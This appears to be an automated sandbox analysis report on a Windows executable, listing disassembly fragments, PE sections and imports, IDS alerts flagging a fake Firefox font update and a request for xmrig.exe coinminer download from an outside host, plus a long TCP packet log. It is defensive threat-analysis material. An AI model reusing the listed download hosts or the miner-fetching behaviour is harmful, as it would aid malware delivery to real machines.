lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [004938ACh]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00498490h
call dword ptr [00493884h]
ret
push 00030000h
push 00010000h
push 00000000h
call 00007F1CA4F78DF5h
add esp, 0Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x93630	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x99e00	0x4540
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9a000	0x435c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x8fb28	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x8bf98	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x937c0	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x89ad0	0x89c00	0bd698a1f44cc91b018d0fe5240109ab	False	0.5286942774500908	data	7.09207256696417	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8b000	0xa034	0xa200	383899a836f6650ba73e1556e24d0e62	False	0.4230806327160494	data	4.888147649186249	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x96000	0x2c5c	0x1600	233e04c81724f6e0f553a5dbb15f0a09	False	0.4073153409090909	data	4.744840434225013	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x99000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x9a000	0x435c	0x4400	b181df1a2af7bbd01ea74e454a21e7ba	False	0.7916475183823529	data	6.714823432652306	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0x9f000	0x56e00	0x56e00	8ad31acc19ff527432c0a659183e3e93	False	1.0003259892086331	OpenPGP Public Key	7.9995877564491815	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xf6000	0x56e00	0x56e00	8ad31acc19ff527432c0a659183e3e93	False	1.0003259892086331	OpenPGP Public Key	7.9995877564491815	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeConsole, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEndOfFile, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

ole32.dll

OleDraw

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-13T13:33:37.859535+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49682	188.114.97.3	443	TCP
2025-03-13T13:33:40.505685+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49684	188.114.97.3	443	TCP
2025-03-13T13:33:42.699100+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49688	188.114.97.3	443	TCP
2025-03-13T13:33:45.501672+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49690	188.114.97.3	443	TCP
2025-03-13T13:33:48.410028+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49691	188.114.97.3	443	TCP
2025-03-13T13:33:50.933221+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49692	188.114.97.3	443	TCP
2025-03-13T13:33:55.415611+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49694	188.114.97.3	443	TCP
2025-03-13T13:34:03.475012+0100	2829056	ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download	2	192.168.2.8	49701	185.215.113.51	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 13:33:36.503892899 CET	49682	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:36.503935099 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:36.504018068 CET	49682	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:36.508591890 CET	49682	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:36.508620024 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:37.859371901 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:37.859534979 CET	49682	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:37.884291887 CET	49682	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:37.884325027 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:37.884867907 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:37.929419994 CET	49682	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:38.323811054 CET	49682	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:38.323843002 CET	49682	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:38.324038029 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:38.993083000 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:38.993156910 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:38.993190050 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:38.993207932 CET	49682	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:38.993227959 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:38.993266106 CET	49682	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:38.993278980 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:38.993328094 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:38.993360996 CET	49682	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:38.993365049 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:38.993379116 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:38.993426085 CET	49682	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:38.993436098 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:38.999442101 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:38.999501944 CET	49682	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:38.999519110 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:39.054404974 CET	49682	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:39.078552008 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:39.132531881 CET	49682	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:39.132580042 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:39.132661104 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:39.132694960 CET	49682	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:39.133646965 CET	49682	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:39.133666992 CET	443	49682	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:39.357992887 CET	49684	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:39.358108044 CET	443	49684	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:39.358194113 CET	49684	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:39.358825922 CET	49684	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:39.358869076 CET	443	49684	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:40.505580902 CET	443	49684	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:40.505685091 CET	49684	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:40.507075071 CET	49684	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:40.507111073 CET	443	49684	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:40.507376909 CET	443	49684	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:40.508852005 CET	49684	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:40.509037018 CET	49684	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:40.509077072 CET	443	49684	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:41.374535084 CET	443	49684	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:41.374825001 CET	49684	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:41.545061111 CET	49688	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:41.545093060 CET	443	49688	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:41.545162916 CET	49688	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:41.545511007 CET	49688	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:41.545526981 CET	443	49688	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:42.699004889 CET	443	49688	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:42.699100018 CET	49688	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:42.700373888 CET	49688	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:42.700383902 CET	443	49688	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:42.700634956 CET	443	49688	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:42.711724043 CET	49688	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:42.712039948 CET	49688	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:42.712071896 CET	443	49688	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:42.712340117 CET	49688	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:42.760329008 CET	443	49688	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:43.558721066 CET	443	49688	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:43.558862925 CET	443	49688	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:43.558938980 CET	49688	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:43.584532022 CET	49688	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:43.584559917 CET	443	49688	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:44.110673904 CET	49690	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:44.110726118 CET	443	49690	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:44.110819101 CET	49690	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:44.111310005 CET	49690	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:44.111329079 CET	443	49690	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:45.501537085 CET	443	49690	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:45.501672029 CET	49690	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:45.503513098 CET	49690	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:45.503529072 CET	443	49690	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:45.503782988 CET	443	49690	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:45.505224943 CET	49690	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:45.505369902 CET	49690	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:45.505402088 CET	443	49690	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:45.505959034 CET	49690	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:45.505970001 CET	443	49690	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:46.441056967 CET	443	49690	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:46.448332071 CET	49690	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:47.077847004 CET	49691	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:47.077897072 CET	443	49691	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:47.078047037 CET	49691	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:47.078306913 CET	49691	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:47.078320026 CET	443	49691	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:48.409594059 CET	443	49691	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:48.410027981 CET	49691	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:48.411345005 CET	49691	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:48.411355019 CET	443	49691	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:48.411604881 CET	443	49691	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:48.413048029 CET	49691	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:48.413170099 CET	49691	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:48.413189888 CET	443	49691	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:49.294042110 CET	443	49691	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:49.294303894 CET	49691	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:49.758661032 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:49.758706093 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:49.758809090 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:49.759190083 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:49.759207964 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:50.933137894 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:50.933221102 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:50.940109968 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:50.940119028 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:50.940485001 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:50.991946936 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:50.994271994 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:51.002686024 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:51.002763033 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:51.002855062 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:51.002897024 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:51.002981901 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:51.003148079 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:51.003251076 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:51.003281116 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:51.003397942 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:51.003428936 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:51.003546000 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:51.003577948 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:51.003592968 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:51.003607035 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:51.003719091 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:51.003756046 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:51.003760099 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:51.003829956 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:51.003897905 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:51.003940105 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:51.003963947 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:51.003971100 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:51.004019976 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:51.004086971 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:51.004122019 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:51.004137039 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:51.004178047 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:53.798980951 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:53.799089909 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:53.799159050 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:53.800565004 CET	49692	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:53.800584078 CET	443	49692	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:53.939399958 CET	49694	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:53.939436913 CET	443	49694	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:53.939518929 CET	49694	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:53.939944983 CET	49694	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:53.939960003 CET	443	49694	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:55.415508032 CET	443	49694	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:55.415611029 CET	49694	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:55.417135000 CET	49694	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:55.417155027 CET	443	49694	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:55.417452097 CET	443	49694	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:55.418734074 CET	49694	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:55.418734074 CET	49694	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:55.418879032 CET	443	49694	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:56.203882933 CET	443	49694	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:56.203926086 CET	443	49694	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:56.203975916 CET	443	49694	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:56.203977108 CET	49694	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:56.203994036 CET	443	49694	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:56.204049110 CET	49694	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:56.204288006 CET	443	49694	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:56.210732937 CET	443	49694	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:56.210783958 CET	443	49694	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:56.210810900 CET	443	49694	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:56.210812092 CET	49694	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:56.210819006 CET	443	49694	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:56.210896969 CET	49694	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:56.210905075 CET	443	49694	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:56.210913897 CET	443	49694	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:56.210997105 CET	49694	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:56.279263020 CET	49694	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:56.279263020 CET	49694	443	192.168.2.8	188.114.97.3
Mar 13, 2025 13:33:56.279309988 CET	443	49694	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:56.279329062 CET	443	49694	188.114.97.3	192.168.2.8
Mar 13, 2025 13:33:56.335216999 CET	49695	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:33:56.340055943 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:56.340131998 CET	49695	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:33:56.344048023 CET	49695	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:33:56.348787069 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.033268929 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.033282995 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.033337116 CET	49695	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:33:57.033355951 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.033476114 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.033488035 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.033502102 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.033512115 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.033524036 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.033526897 CET	49695	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:33:57.033538103 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.033550024 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.033581972 CET	49695	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:33:57.033602953 CET	49695	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:33:57.038031101 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.038043976 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.038055897 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.038074017 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.038077116 CET	49695	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:33:57.038130045 CET	49695	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:33:57.038315058 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.085690975 CET	49695	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:33:57.160006046 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.160026073 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.160052061 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.160064936 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.160078049 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.160090923 CET	49695	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:33:57.160113096 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.160126925 CET	80	49695	185.215.113.51	192.168.2.8
Mar 13, 2025 13:33:57.160128117 CET	49695	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:33:57.160166979 CET	49695	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:33:59.719881058 CET	49699	443	192.168.2.8	172.67.19.24
Mar 13, 2025 13:33:59.719918966 CET	443	49699	172.67.19.24	192.168.2.8
Mar 13, 2025 13:33:59.720010042 CET	49699	443	192.168.2.8	172.67.19.24
Mar 13, 2025 13:33:59.726680040 CET	49699	443	192.168.2.8	172.67.19.24
Mar 13, 2025 13:33:59.726701021 CET	443	49699	172.67.19.24	192.168.2.8
Mar 13, 2025 13:34:01.074836969 CET	443	49699	172.67.19.24	192.168.2.8
Mar 13, 2025 13:34:01.074923038 CET	49699	443	192.168.2.8	172.67.19.24
Mar 13, 2025 13:34:01.077483892 CET	49699	443	192.168.2.8	172.67.19.24
Mar 13, 2025 13:34:01.077492952 CET	443	49699	172.67.19.24	192.168.2.8
Mar 13, 2025 13:34:01.077752113 CET	443	49699	172.67.19.24	192.168.2.8
Mar 13, 2025 13:34:01.132615089 CET	49699	443	192.168.2.8	172.67.19.24
Mar 13, 2025 13:34:01.149147034 CET	49699	443	192.168.2.8	172.67.19.24
Mar 13, 2025 13:34:01.192321062 CET	443	49699	172.67.19.24	192.168.2.8
Mar 13, 2025 13:34:02.075872898 CET	443	49699	172.67.19.24	192.168.2.8
Mar 13, 2025 13:34:02.075989962 CET	443	49699	172.67.19.24	192.168.2.8
Mar 13, 2025 13:34:02.076484919 CET	49699	443	192.168.2.8	172.67.19.24
Mar 13, 2025 13:34:02.109813929 CET	49699	443	192.168.2.8	172.67.19.24
Mar 13, 2025 13:34:02.742644072 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:02.747349977 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:02.747421980 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:02.751388073 CET	49702	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:02.756102085 CET	80	49702	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:02.756176949 CET	49702	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:02.832865953 CET	49701	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:02.833147049 CET	49702	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:02.837599039 CET	80	49701	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:02.837800980 CET	80	49702	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.448944092 CET	80	49702	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.448967934 CET	80	49702	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.448978901 CET	80	49702	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.448991060 CET	80	49702	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.449003935 CET	80	49702	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.449042082 CET	49702	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.449090958 CET	49702	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.449098110 CET	80	49702	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.449117899 CET	80	49702	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.449131012 CET	80	49702	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.449141026 CET	80	49702	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.449155092 CET	80	49702	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.449157000 CET	49702	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.449173927 CET	49702	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.449208021 CET	49702	80	192.168.2.8	185.215.113.51
Mar 13, 2025 13:34:03.454206944 CET	80	49702	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.454250097 CET	80	49702	185.215.113.51	192.168.2.8
Mar 13, 2025 13:34:03.454262972 CET	80	49702	185.215.113.51	192.168.2.8
